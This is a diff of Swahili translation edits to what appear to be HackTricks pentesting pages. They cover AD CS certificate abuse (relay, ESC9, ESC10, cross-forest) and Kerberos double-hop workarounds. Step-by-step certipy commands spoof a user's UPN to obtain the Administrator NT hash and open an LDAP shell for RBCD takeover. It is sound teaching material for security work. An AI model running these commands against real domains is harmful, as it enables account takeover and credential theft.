Mali ya `msPKI-Enrollment-Servers` hutumiwa na Mamlaka za Cheti za Kampuni (CAs) kuhifadhi vituo vya Huduma ya Usajili wa Cheti (CES). Vituo hivi vinaweza kuchambuliwa na kuorodheshwa kwa kutumia zana **Certutil.exe**:
|
||||
```
|
||||
certutil.exe -enrollmentServerURL -config DC01.DOMAIN.LOCAL\DOMAIN-CA
|
||||
```
|
||||
|
@ -396,9 +396,9 @@ execute-assembly C:\SpoolSample\SpoolSample\bin\Debug\SpoolSample.exe <victim> <
|
|||
```
|
||||
#### Matumizi mabaya na [Certipy](https://github.com/ly4k/Certipy)
|
||||
|
||||
Ombi la cheti hufanywa na Certipy kwa msingi wa kigezo cha `Machine` au `User`, kulingana na ikiwa jina la akaunti linalotumika linamalizika kwa `$`. Maelezo ya kigezo mbadala yanaweza kufikiwa kwa kutumia parameter ya `-template`.
|
||||
Ombi la cheti hufanywa na Certipy kwa msingi wa kigezo cha `Machine` au `User`, kulingana na ikiwa jina la akaunti linalotumika linamalizika kwa `$`. Maelezo ya kigezo mbadala yanaweza kufikiwa kupitia matumizi ya parameter ya `-template`.
|
||||
|
||||
Mbinu kama [PetitPotam](https://github.com/ly4k/PetitPotam) inaweza kutumika kwa kushinikiza uthibitisho. Wakati unashughulika na wadhibiti wa kikoa, maelezo ya `-template DomainController` yanahitajika.
|
||||
Mbinu kama [PetitPotam](https://github.com/ly4k/PetitPotam) inaweza kutumika kwa kushurutisha uthibitisho. Wakati unashughulika na wadhibiti wa kikoa, maelezo ya `-template DomainController` yanahitajika.
|
||||
```bash
|
||||
certipy relay -ca ca.corp.local
|
||||
Certipy v4.0.0 - by Oliver Lyak (ly4k)
|
||||
|
@ -415,24 +415,24 @@ Certipy v4.0.0 - by Oliver Lyak (ly4k)
|
|||
|
||||
### Maelezo
|
||||
|
||||
Thamani mpya **`CT_FLAG_NO_SECURITY_EXTENSION`** (`0x80000`) kwa **`msPKI-Enrollment-Flag`**, inayojulikana kama ESC9, inazuia uingizaji wa **mzizi mpya wa usalama wa `szOID_NTDS_CA_SECURITY_EXT`** kwenye cheti. Bendera hii inakuwa muhimu wakati `StrongCertificateBindingEnforcement` inawekwa kama `1` (chaguo la msingi), ikilinganishwa na kuwekwa kama `2`. Umuhimu wake unakuwa mkubwa katika mazingira ambapo uwekaji dhaifu wa cheti kwa Kerberos au Schannel unaweza kutumiwa (kama katika ESC10), ikizingatiwa kwamba kutokuwepo kwa ESC9 haitabadilisha mahitaji.
|
||||
Thamani mpya **`CT_FLAG_NO_SECURITY_EXTENSION`** (`0x80000`) kwa **`msPKI-Enrollment-Flag`**, inayojulikana kama ESC9, inazuia uingizaji wa **mzizi mpya wa usalama wa `szOID_NTDS_CA_SECURITY_EXT`** kwenye cheti. Bendera hii inakuwa muhimu wakati `StrongCertificateBindingEnforcement` imewekwa kwa `1` (chaguo la msingi), ikilinganishwa na kuwekwa kwa `2`. Umuhimu wake unakuwa mkubwa katika mazingira ambapo uwekaji dhaifu wa cheti kwa Kerberos au Schannel unaweza kutumiwa (kama katika ESC10), ikizingatiwa kwamba kutokuwepo kwa ESC9 haitabadilisha mahitaji.
|
||||
|
||||
Mazingira ambayo mipangilio ya bendera hii inakuwa muhimu ni pamoja na:
|
||||
|
||||
- `StrongCertificateBindingEnforcement` haijabadilishwa kuwa `2` (ambapo chaguo la msingi ni `1`), au `CertificateMappingMethods` inajumuisha bendera ya `UPN`.
|
||||
- `StrongCertificateBindingEnforcement` haijarekebishwa kuwa `2` (ambapo chaguo la msingi ni `1`), au `CertificateMappingMethods` inajumuisha bendera ya `UPN`.
|
||||
- Cheti lina alama ya bendera ya `CT_FLAG_NO_SECURITY_EXTENSION` ndani ya mipangilio ya `msPKI-Enrollment-Flag`.
|
||||
- EKU yoyote ya uthibitishaji wa mteja imefafanuliwa na cheti.
|
||||
- Mamlaka ya kuandika ya jumla yanapatikana juu ya akaunti yoyote kwa kusudi la kuhatarisha nyingine.
|
||||
- Mamlaka ya kuandika kwa jumla yanapatikana juu ya akaunti yoyote kwa kusudi la kuhatarisha nyingine.
|
||||
|
||||
### Kesi ya Matumizi Mabaya
|
||||
### Skena ya Mabaya
|
||||
|
||||
Fikiria `John@corp.local` ana mamlaka ya `GenericWrite` juu ya `Jane@corp.local`, na lengo la kuhatarisha `Administrator@corp.local`. Kigezo cha cheti cha `ESC9`, ambacho `Jane@corp.local` ameruhusiwa kujiandikisha, kimeboreshwa na bendera ya `CT_FLAG_NO_SECURITY_EXTENSION` katika mipangilio yake ya `msPKI-Enrollment-Flag`.
|
||||
Fikiria `John@corp.local` ana mamlaka ya `GenericWrite` juu ya `Jane@corp.local`, na lengo la kuhatarisha `Administrator@corp.local`. Kigezo cha cheti cha `ESC9`, ambacho `Jane@corp.local` ameruhusiwa kusajili, kimeboreshwa na bendera ya `CT_FLAG_NO_SECURITY_EXTENSION` katika mipangilio yake ya `msPKI-Enrollment-Flag`.
|
||||
|
||||
Kwa kuanzia, hash ya `Jane` inapata kutumia Vitambulisho vya Kivuli, shukrani kwa `GenericWrite` ya `John`:
|
||||
Kwanza, hash ya `Jane` inapata kutumia Sajili ya Vitambulisho, shukrani kwa `GenericWrite` ya `John`:
|
||||
```bash
|
||||
certipy shadow auto -username John@corp.local -password Passw0rd! -account Jane
|
||||
```
|
||||
Kufuatia hilo, `userPrincipalName` ya `Jane` imebadilishwa kuwa `Administrator`, kwa makusudi ikikosa sehemu ya uwanja ya `@corp.local`:
|
||||
Kufuatia hilo, `userPrincipalName` ya `Jane` inabadilishwa kuwa `Administrator`, kwa makusudi ikikosa sehemu ya uwanja ya `@corp.local`:
|
||||
```bash
|
||||
certipy account update -username John@corp.local -password Passw0rd! -user Jane -upn Administrator
|
||||
```
|
||||
|
@ -442,13 +442,13 @@ Kufuatia hili, kiolesura cha cheti cha `ESC9`, kilichobainishwa kuwa hatarini, k
|
|||
```bash
|
||||
certipy req -username jane@corp.local -hashes <hash> -ca corp-DC-CA -template ESC9
|
||||
```
|
||||
Inaonekana kwamba `userPrincipalName` ya cheti inaonyesha `Administrator`, bila "object SID" yoyote.
|
||||
Inaonekana kwamba `userPrincipalName` ya cheti inaonyesha `Administrator`, bila "object SID".
|
||||
|
||||
`userPrincipalName` ya `Jane` kisha irudishwa kwenye yake ya awali, `Jane@corp.local`:
|
||||
`userPrincipalName` ya `Jane` kisha irudishwa kwa yake ya awali, `Jane@corp.local`:
|
||||
```bash
|
||||
certipy account update -username John@corp.local -password Passw0rd! -user Jane -upn Jane@corp.local
|
||||
```
|
||||
Kujaribu uthibitisho na cheti kilichotolewa sasa kunazalisha NT hash ya `Administrator@corp.local`. Amri lazima ijumuishe `-domain <domain>` kutokana na kutokuwepo kwa maelezo ya uwanja kwenye cheti:
|
||||
Kujaribu uthibitisho na cheti kilichotolewa sasa kunazaa NT hash ya `Administrator@corp.local`. Amri lazima ijumuishe `-domain <domain>` kutokana na kutokuwepo kwa maelezo ya kikoa kwenye cheti:
|
||||
```bash
|
||||
certipy auth -pfx adminitrator.pfx -domain corp.local
|
||||
```
|
||||
|
@ -458,8 +458,8 @@ certipy auth -pfx adminitrator.pfx -domain corp.local
|
|||
|
||||
Thamani mbili za funguo za usajili kwenye kisanduku cha kudhibiti kikoa zinahusishwa na ESC10:
|
||||
|
||||
* Thamani ya msingi ya `CertificateMappingMethods` chini ya `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel` ni `0x18` (`0x8 | 0x10`), awali iliyowekwa kama `0x1F`.
|
||||
* Mipangilio ya msingi ya `StrongCertificateBindingEnforcement` chini ya `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc` ni `1`, awali `0`.
|
||||
* Thamani ya msingi ya `CertificateMappingMethods` chini ya `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel` ni `0x18` (`0x8 | 0x10`), hapo awali iliyowekwa kama `0x1F`.
|
||||
* Mipangilio ya msingi ya `StrongCertificateBindingEnforcement` chini ya `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc` ni `1`, hapo awali `0`.
|
||||
|
||||
**Kesi 1**
|
||||
|
||||
|
@ -469,21 +469,21 @@ Wakati `StrongCertificateBindingEnforcement` inapowekwa kama `0`.
|
|||
|
||||
Ikiwa `CertificateMappingMethods` inajumuisha biti ya `UPN` (`0x4`).
|
||||
|
||||
### Kesi ya Mabaya 1
|
||||
### Kesi ya Uvunjaji 1
|
||||
|
||||
Kwa `StrongCertificateBindingEnforcement` ikiwa imewekwa kama `0`, akaunti A yenye ruhusa za `GenericWrite` inaweza kutumiwa kudukua akaunti yoyote B.
|
||||
|
||||
Kwa mfano, ikiwa na ruhusa za `GenericWrite` juu ya `Jane@corp.local`, mkaidi ananuia kudukua `Administrator@corp.local`. Mchakato unafanana na ESC9, kuruhusu templeti yoyote ya cheti kutumika.
|
||||
|
||||
Kwanza, hash ya `Jane` inapata kutumia Sera za Kivuli, kwa kutumia `GenericWrite`.
|
||||
Kwanza, hash ya `Jane` inachukuliwa kutumia Sera za Kivuli, kudukua `GenericWrite`.
|
||||
```bash
|
||||
certipy shadow autho -username John@corp.local -p Passw0rd! -a Jane
|
||||
```
|
||||
Kufuatia hayo, `userPrincipalName` ya `Jane` inabadilishwa kuwa `Administrator`, kwa makusudi kutoa sehemu ya `@corp.local` ili kuepuka kukiuka kizuizi.
|
||||
Kufuatia hayo, `userPrincipalName` ya `Jane` imebadilishwa kuwa `Administrator`, kwa makusudi kutoa sehemu ya `@corp.local` ili kuepuka kukiuka kizuizi.
|
||||
```bash
|
||||
certipy account update -username John@corp.local -password Passw0rd! -user Jane -upn Administrator
|
||||
```
|
||||
Kufuatia hilo, cheti linalowezesha uthibitishaji wa mteja linahitajika kama `Jane`, ukitumia templeti ya `Mtumiaji` ya msingi.
|
||||
Kufuatia hili, cheti kinachowezesha uthibitishaji wa mteja kinahitajika kama `Jane`, ukitumia kigezo cha `Mtumiaji` cha msingi.
|
||||
```bash
|
||||
certipy req -ca 'corp-DC-CA' -username Jane@corp.local -hashes <hash>
|
||||
```
|
||||
|
@ -491,19 +491,19 @@ certipy req -ca 'corp-DC-CA' -username Jane@corp.local -hashes <hash>
|
|||
```bash
|
||||
certipy account update -username John@corp.local -password Passw0rd! -user Jane -upn Jane@corp.local
|
||||
```
|
||||
Kuhalalisha kwa cheti kilichopatikana kutatoa NT hash ya `Administrator@corp.local`, ikilazimu kutaja kikoa katika amri kutokana na kutokuwepo kwa maelezo ya kikoa kwenye cheti.
|
||||
Kuhalalisha kwa cheti kilichopatikana kutatoa NT hash ya `Administrator@corp.local`, hivyo kuhitaji kutaja kikoa katika amri kutokana na kutokuwepo kwa maelezo ya kikoa kwenye cheti.
|
||||
```bash
|
||||
certipy auth -pfx administrator.pfx -domain corp.local
|
||||
```
|
||||
### Kesi ya Matumizi 2
|
||||
|
||||
Kwa `CertificateMappingMethods` inayo `UPN` bit flag (`0x4`), akaunti A yenye ruhusa za `GenericWrite` inaweza kudhoofisha akaunti yoyote B ambayo haina mali ya `userPrincipalName`, ikiwa ni pamoja na akaunti za mashine na msimamizi wa domain aliyejengwa `Administrator`.
|
||||
Kwa `CertificateMappingMethods` inayo `UPN` bit flag (`0x4`), akaunti A yenye ruhusa ya `GenericWrite` inaweza kudhoofisha akaunti yoyote B ambayo haina mali ya `userPrincipalName`, ikiwa ni pamoja na akaunti za mashine na msimamizi wa domain aliyejengwa `Administrator`.
|
||||
|
||||
Hapa, lengo ni kudhoofisha `DC$@corp.local`, kuanzia kupata hash ya `Jane` kupitia Shadow Credentials, kwa kutumia `GenericWrite`.
|
||||
Hapa, lengo ni kudhoofisha `DC$@corp.local`, kuanzia na kupata hash ya `Jane` kupitia Shadow Credentials, kwa kutumia `GenericWrite`.
|
||||
```bash
|
||||
certipy shadow auto -username John@corp.local -p Passw0rd! -account Jane
|
||||
```
|
||||
`Jane`'s `userPrincipalName` inawekwa kuwa `DC$@corp.local`.
|
||||
`userPrincipalName` ya `Jane` inawekwa kuwa `DC$@corp.local`.
|
||||
```bash
|
||||
certipy account update -username John@corp.local -password Passw0rd! -user Jane -upn 'DC$@corp.local'
|
||||
```
|
||||
|
@ -519,21 +519,21 @@ Kutambulisha kupitia Schannel, chaguo la `-ldap-shell` la Certipy hutumiwa, ikio
|
|||
```bash
|
||||
certipy auth -pfx dc.pfx -dc-ip 172.16.126.128 -ldap-shell
|
||||
```
|
||||
Kupitia ganda la LDAP, amri kama vile `set_rbcd` huwezesha mashambulizi ya Uteuzi uliopunguzwa kwa Msingi wa Rasilmali (RBCD), ikisababisha uwezekano wa kudhoofisha kudhibiti kikontrola cha uwanja.
|
||||
Kupitia kifaa cha LDAP, amri kama vile `set_rbcd` huwezesha mashambulizi ya Resource-Based Constrained Delegation (RBCD), yakileta hatari ya kudhoofisha kudhibiti kikoa.
|
||||
```bash
|
||||
certipy auth -pfx dc.pfx -dc-ip 172.16.126.128 -ldap-shell
|
||||
```
|
||||
Hii udhaifu pia unahusisha akaunti yoyote ya mtumiaji ambayo haina `userPrincipalName` au ambapo haifanani na `sAMAccountName`, na `Administrator@corp.local` ya chaguo-msingi ikiwa lengo kuu kutokana na mamlaka yake ya LDAP iliyoinuliwa na kutokuwepo kwa `userPrincipalName` kwa chaguo-msingi.
|
||||
Hii udhaifu pia unahusisha akaunti yoyote ya mtumiaji ambayo haina `userPrincipalName` au ambapo haifanani na `sAMAccountName`, na hali ya kawaida ya `Administrator@corp.local` kuwa lengo kuu kutokana na mamlaka yake ya LDAP iliyoinuliwa na kutokuwepo kwa `userPrincipalName` kwa chaguo-msingi.
|
||||
|
||||
## Kuvunja Misitu kwa Kutumia Vyeti Kwa Uelewa wa Kitenzi cha Kumalizia
|
||||
## Kuvunja Misitu kwa Kutumia Vyeti kwa Uelewa wa Kitenzi cha Kupokelewa
|
||||
|
||||
### Kuvunja Uaminifu wa Misitu kwa Kutumia CAs Zilizodhuriwa
|
||||
### Kuvunja Uaminifu wa Misitu kwa Kutumia CAs Zilizovamiwa
|
||||
|
||||
Usanidi wa **usajili wa msitu wa msitu** unafanywa kuwa rahisi. **Cheti cha CA cha msingi** kutoka kwa msitu wa rasilimali **huchapishwa kwa misitu ya akaunti** na waendeshaji, na vyeti vya **CA ya kampuni** kutoka kwa msitu wa rasilimali **huongezwa kwenye kontena za `NTAuthCertificates` na AIA katika kila msitu wa akaunti**. Ili kufafanua, makubaliano haya yanatoa **udhibiti kamili kwa CA katika msitu wa rasilimali** juu ya misitu mingine yote ambayo inasimamia PKI. Ikiwa CA hii itakuwa **imedorora na wachomaji**, vyeti kwa watumiaji wote katika misitu ya rasilimali na akaunti yanaweza **kudanganywa na wao**, hivyo kuvunja kizuizi cha usalama wa msitu.
|
||||
Usanidi wa **kujiandikisha kwa misitu tofauti** unafanywa kuwa rahisi. **Cheti cha CA cha msingi** kutoka kwa misitu ya rasilimali kinawekwa **kwenye misitu ya akaunti na waendeshaji**, na vyeti vya **CA ya kampuni** kutoka kwa misitu ya rasilimali vinawekwa **kwenye kontena za `NTAuthCertificates` na AIA katika kila misitu ya akaunti**. Ili kufafanua, makubaliano haya yanatoa **udhibiti kamili kwa CA katika misitu ya rasilimali** juu ya misitu mingine yote ambayo inasimamia PKI. Ikiwa CA hii itakuwa **imevamiwa na wachomaji**, vyeti vya watumiaji wote katika misitu ya rasilimali na akaunti vinaweza **kudanganywa na wao**, hivyo kuvunja kizuizi cha usalama cha misitu.
|
||||
|
||||
### Haki za Usajili Zilizotolewa kwa Mabalozi wa Kigeni
|
||||
### Haki za Kujiandikisha Zilizotolewa kwa Mabalozi wa Kigeni
|
||||
|
||||
Katika mazingira ya misitu mingi, tahadhari inahitajika kuhusu CA za Kampuni ambazo **huchapisha templeti za vyeti** ambazo huruhusu **Watumiaji waliothibitishwa au mabalozi wa kigeni** (watumiaji/vikundi vya nje ya msitu ambao CA ya Kampuni inamiliki) **haki za usajili na kuhariri**.\
|
||||
Baada ya uthibitisho kupitia uaminifu, **SID ya Watumiaji waliothibitishwa** inaongezwa kwa token ya mtumiaji na AD. Hivyo, ikiwa kikoa kina CA ya Kampuni na templeti inayoruhusu **haki za usajili kwa Watumiaji waliothibitishwa**, templeti inaweza pia **kusajiliwa na mtumiaji kutoka msitu tofauti**. Vivyo hivyo, ikiwa **haki za usajili zimetolewa wazi kwa balozi wa kigeni kupitia templeti**, **uhusiano wa kudhibiti upatikanaji wa msitu wa msitu unatengenezwa**, kuruhusu balozi kutoka msitu mmoja **kusajiliwa kwenye templeti kutoka msitu mwingine**.
|
||||
Katika mazingira ya misitu mingi, tahadhari inahitajika kuhusu CA za Kampuni ambazo **huchapisha templeti za vyeti** ambazo huruhusu **Watumiaji waliothibitishwa au mabalozi wa kigeni** (watumiaji/vikundi vya nje ya misitu ambayo CA ya Kampuni inamiliki) **haki za kujiandikisha na kuhariri**.\
|
||||
Baada ya kuthibitishwa kwenye uaminifu, **SID ya Watumiaji waliothibitishwa** inaongezwa kwenye token ya mtumiaji na AD. Hivyo, ikiwa kikoa kina CA ya Kampuni na templeti inayoruhusu **Watumiaji waliothibitishwa kuwa na haki za kujiandikisha**, templeti inaweza **kujiandikisha na mtumiaji kutoka msitu tofauti**. Vivyo hivyo, ikiwa **haki za kujiandikisha zimetolewa wazi kwa balozi wa kigeni kupitia templeti**, **uhusiano wa kudhibiti upatikanaji wa msitu wa kigeni unajengwa**, kuruhusu balozi kutoka msitu mmoja **kujiandikisha kwenye templeti kutoka msitu mwingine**.
|
||||
|
||||
Mifano yote inasababisha **ongezeko la eneo la shambulio** kutoka msitu mmoja hadi mwingine. Mipangilio ya templeti ya cheti inaweza kutumiwa na mshambuliaji kupata mamlaka zaidi katika kikoa cha kigeni.
|
||||
Mazingira yote mawili yanapelekea **ongezeko la eneo la shambulio** kutoka msitu mmoja hadi mwingine. Mipangilio ya templeti ya cheti inaweza kutumiwa na mchomaji kupata mamlaka zaidi katika kikoa cha kigeni.
|
||||
|
|
|
@ -4,39 +4,43 @@
|
|||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, ungependa kuona **kampuni yako ikionekana katika HackTricks**? Au ungependa kupata **toleo jipya zaidi la PEASS au kupakua HackTricks kwa muundo wa PDF**? Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **nifuatilie** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwenye** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, unataka kuona **kampuni yako ikitangazwa kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* Pata [**swagi rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**repo ya hacktricks**](https://github.com/carlospolop/hacktricks) **na** [**repo ya hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
## Utangulizi
|
||||
|
||||
Tatizo la "Mara Mbili" la Kerberos linatokea wakati mshambuliaji anajaribu kutumia **uthibitisho wa Kerberos kupitia hatua mbili**, kwa mfano kwa kutumia **PowerShell**/**WinRM**.
|
||||
Tatizo la "Mara Mbili" la Kerberos hutokea wakati muhusika anajaribu kutumia **uthibitisho wa Kerberos kupitia** **hops** mbili, kwa mfano kutumia **PowerShell**/**WinRM**.
|
||||
|
||||
Wakati **uthibitisho** unapotokea kupitia **Kerberos**, **vyeti** **havihifadhiwi** kwenye **kumbukumbu**. Kwa hiyo, ikiwa unatumia mimikatz hutapata vyeti vya mtumiaji kwenye kompyuta hata kama anatumia michakato.
|
||||
Wakati **uthibitisho** unapotokea kupitia **Kerberos**, **vyeti** **havihifadhiwi** kwenye **kumbukumbu**. Kwa hivyo, ikiwa unatumia mimikatz hutapata vyeti vya mtumiaji kwenye mashine hata kama anatekeleza michakato.
|
||||
|
||||
Hii ni kwa sababu wakati unapojiunganisha na Kerberos hatua zifuatazo hufanyika:
|
||||
Hii ni kwa sababu wakati wa kuunganisha na Kerberos hatua zifuatazo hufanyika:
|
||||
|
||||
1. User1 hutoa vyeti na **kudhibitiwa kwa kikoa** hurudisha **TGT** ya Kerberos kwa User1.
|
||||
2. User1 anatumia **TGT** kuomba **cheti cha huduma** ili **kuunganisha** na Server1.
|
||||
3. User1 **anaunganisha** na **Server1** na hutoa **cheti cha huduma**.
|
||||
4. **Server1** **haina** vyeti vya User1 vilivyohifadhiwa au **TGT** ya User1. Kwa hiyo, wakati User1 kutoka Server1 anajaribu kuingia kwenye seva ya pili, hawezi **kuthibitisha kitambulisho**.
|
||||
1. User1 hutoa vyeti na **domain controller** hurudisha **TGT** ya Kerberos kwa User1.
|
||||
2. User1 hutumia **TGT** kuomba **tiketi ya huduma** ili **kuunganisha** kwenye Seva1.
|
||||
3. User1 **anaunganisha** kwenye **Seva1** na hutoa **tiketi ya huduma**.
|
||||
4. **Seva1** **haina** **vyeti** vya User1 vilivyohifadhiwa au **TGT** ya User1. Kwa hivyo, wakati User1 kutoka Seva1 anajaribu kuingia kwenye seva ya pili, hawezi **kuthibitishwa**.
|
||||
|
||||
### Utekelezaji Usiozuiliwa
|
||||
### Uteuzi Usiozuiliwa
|
||||
|
||||
Ikiwa **utekelezaji usiozuiliwa** umewezeshwa kwenye PC, hii haitatokea kwani **Seva** itapata **TGT** ya kila mtumiaji anayeiingia. Zaidi ya hayo, ikiwa utekelezaji usiozuiliwa unatumika, labda unaweza **kudhoofisha Kudhibiti Kikoa** kutoka hapo.\
|
||||
[**Maelezo zaidi katika ukurasa wa utekelezaji usiozuiliwa**](unconstrained-delegation.md).
|
||||
Ikiwa **uteuzi usiozuiliwa** umewezeshwa kwenye PC, hii haitatokea kwani **Seva** itapata **TGT** ya kila mtumiaji anayeipata. Zaidi ya hayo, ikiwa uteuzi usiozuiliwa unatumika labda unaweza **kuambukiza Msimamizi wa Kikoa** kutoka hapo.\
|
||||
[Maelezo zaidi kwenye ukurasa wa uteuzi usiozuiliwa](unconstrained-delegation.md).
|
||||
|
||||
### CredSSP
|
||||
|
||||
Njia nyingine ya kuepuka tatizo hili ambayo ni [**hatari sana**](https://docs.microsoft.com/en-us/powershell/module/microsoft.wsman.management/enable-wsmancredssp?view=powershell-7) ni **Mtoa Msaada wa Usalama wa Kitambulisho**. Kutoka kwa Microsoft:
|
||||
Njia nyingine ya kuepuka tatizo hili ambayo ni [**si salama sana**](https://docs.microsoft.com/en-us/powershell/module/microsoft.wsman.management/enable-wsmancredssp?view=powershell-7) ni **Mtoaji wa Usaidizi wa Usalama wa Vyeti**. Kutoka kwa Microsoft:
|
||||
|
||||
> Uthibitisho wa CredSSP huruhusu uthibitisho wa kitambulisho cha mtumiaji kutoka kwenye kompyuta ya ndani kwenda kwenye kompyuta ya mbali. Mazoea haya huongeza hatari ya usalama ya operesheni ya mbali. Ikiwa kompyuta ya mbali imevamiwa, vyeti vinapopitishwa kwake, vyeti vinaweza kutumika kudhibiti kikao cha mtandao.
|
||||
> Uthibitisho wa CredSSP unaweka vyeti vya mtumiaji kutoka kwenye kompyuta ya ndani kwenda kwenye kompyuta ya mbali. Mazoea haya huongeza hatari ya usalama wa operesheni ya mbali. Ikiwa kompyuta ya mbali imeathiriwa, vyeti vinapopitishwa kwake, vyeti vinaweza kutumika kudhibiti kikao cha mtandao.
|
||||
|
||||
Inashauriwa sana kwamba **CredSSP** iwe imelemazwa kwenye mifumo ya uzalishaji, mitandao yenye hisia, na mazingira kama hayo kutokana na wasiwasi wa usalama. Ili kujua ikiwa **CredSSP** imezimwa, amri ya `Get-WSManCredSSP` inaweza kukimbia. Amri hii inaruhusu **uchunguzi wa hali ya CredSSP** na inaweza hata kutekelezwa kwa mbali, ikiwa **WinRM** imezimwa.
|
||||
Inashauriwa sana kwamba **CredSSP** izimwe kwenye mifumo ya uzalishaji, mitandao inayohitaji usiri, na mazingira kama hayo kutokana na wasiwasi wa usalama. Ili kubaini ikiwa **CredSSP** imezimwa, amri ya `Get-WSManCredSSP` inaweza kutekelezwa. Amri hii inaruhusu **uchunguzi wa hali ya CredSSP** na inaweza hata kutekelezwa kijijini, ikitoa **WinRM** imezimwa.
|
||||
```powershell
|
||||
Invoke-Command -ComputerName bizintel -Credential ta\redsuit -ScriptBlock {
|
||||
Get-WSManCredSSP
|
||||
|
@ -44,20 +48,20 @@ Get-WSManCredSSP
|
|||
```
|
||||
## Njia za Kuzunguka
|
||||
|
||||
### Kuita Amri
|
||||
### Amuru Amri
|
||||
|
||||
Ili kushughulikia tatizo la double hop, njia inayohusisha `Invoke-Command` iliyopachikwa imeonyeshwa. Hii haishughulikii tatizo moja kwa moja lakini inatoa njia ya kuzunguka bila kuhitaji mipangilio maalum. Njia hii inaruhusu kutekeleza amri (`hostname`) kwenye seva ya pili kupitia amri ya PowerShell iliyotekelezwa kutoka kwenye kifaa cha kwanza cha kushambulia au kupitia PS-Session iliyowekwa hapo awali na seva ya kwanza. Hapa kuna jinsi ya kufanya hivyo:
|
||||
Kukabiliana na shida ya mara mbili ya kuruka, njia inayohusisha `Invoke-Command` iliyofichwa inapendekezwa. Hii haishughulikii tatizo moja kwa moja lakini inatoa suluhisho bila kuhitaji mipangilio maalum. Mbinu hii inaruhusu kutekeleza amri (`hostname`) kwenye seva ya pili kupitia amri ya PowerShell iliyotekelezwa kutoka kwa mashine ya kwanza ya kushambulia au kupitia kikao cha PS kilichoundwa mapema na seva ya kwanza. Hivi ndivyo inavyofanyika:
|
||||
```powershell
|
||||
$cred = Get-Credential ta\redsuit
|
||||
Invoke-Command -ComputerName bizintel -Credential $cred -ScriptBlock {
|
||||
Invoke-Command -ComputerName secdev -Credential $cred -ScriptBlock {hostname}
|
||||
}
|
||||
```
|
||||
Kwa upande mwingine, inapendekezwa kuweka PS-Session na server ya kwanza na kukimbia `Invoke-Command` kwa kutumia `$cred` ili kusambaza kazi.
|
||||
Au kuanzisha PS-Session na server ya kwanza na kukimbia `Invoke-Command` kutumia `$cred` inapendekezwa kwa ajili ya kusambaza kazi.
|
||||
|
||||
### Jisajili kwa PSSession Configuration
|
||||
### Jisajili PSSession Configuration
|
||||
|
||||
Suluhisho la kuepuka tatizo la double hop linahusisha kutumia `Register-PSSessionConfiguration` na `Enter-PSSession`. Njia hii inahitaji njia tofauti na `evil-winrm` na inaruhusu kikao ambacho hakipatwi na kizuizi cha double hop.
|
||||
Lahaja ya kuepuka tatizo la double hop inahusisha kutumia `Register-PSSessionConfiguration` na `Enter-PSSession`. Mbinu hii inahitaji njia tofauti na `evil-winrm` na inaruhusu kikao ambacho hakisumbuliwi na kizuizi cha double hop.
|
||||
```powershell
|
||||
Register-PSSessionConfiguration -Name doublehopsess -RunAsCredential domain_name\username
|
||||
Restart-Service WinRM
|
||||
|
@ -66,28 +70,28 @@ klist
|
|||
```
|
||||
### PortForwarding
|
||||
|
||||
Kwa waendeshaji wa ndani kwenye lengo la kati, kuwezesha mbele ya bandari kunaruhusu maombi kutumwa kwa seva ya mwisho. Kwa kutumia `netsh`, sheria inaweza kuongezwa kwa ajili ya kuwezesha mbele ya bandari, pamoja na sheria ya Windows firewall kuruhusu bandari iliyowezeshwa.
|
||||
Kwa waendeshaji wa ndani kwenye lengo la kati, kupeleka bandari inaruhusu maombi kutumwa kwa seva ya mwisho. Kwa kutumia `netsh`, sheria inaweza kuongezwa kwa ajili ya kupeleka bandari, pamoja na sheria ya firewall ya Windows kuruhusu bandari iliyopelekwa.
|
||||
```bash
|
||||
netsh interface portproxy add v4tov4 listenport=5446 listenaddress=10.35.8.17 connectport=5985 connectaddress=10.35.8.23
|
||||
netsh advfirewall firewall add rule name=fwd dir=in action=allow protocol=TCP localport=5446
|
||||
```
|
||||
#### winrs.exe
|
||||
|
||||
